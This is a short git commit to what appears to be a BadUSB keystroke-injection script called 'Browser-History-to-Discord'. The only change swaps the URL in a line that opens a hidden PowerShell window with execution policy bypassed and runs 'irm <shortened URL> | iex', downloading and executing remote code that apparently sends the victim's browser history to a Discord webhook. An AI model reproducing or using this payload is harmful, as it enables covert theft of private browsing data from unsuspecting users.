From ab0288731f4f5da8a68d4b78c016992b924080d8 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Mon, 16 Jun 2025 10:05:22 +0000 Subject: [PATCH] Update Browser-History-to-Discord.txt --- Browser-History-to-Discord/Browser-History-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Browser-History-to-Discord/Browser-History-to-Discord.txt b/Browser-History-to-Discord/Browser-History-to-Discord.txt index ad5ce0c..4bc25ba 100644 --- a/Browser-History-to-Discord/Browser-History-to-Discord.txt +++ b/Browser-History-to-Discord/Browser-History-to-Discord.txt @@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_bh_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/uki | iex ENTER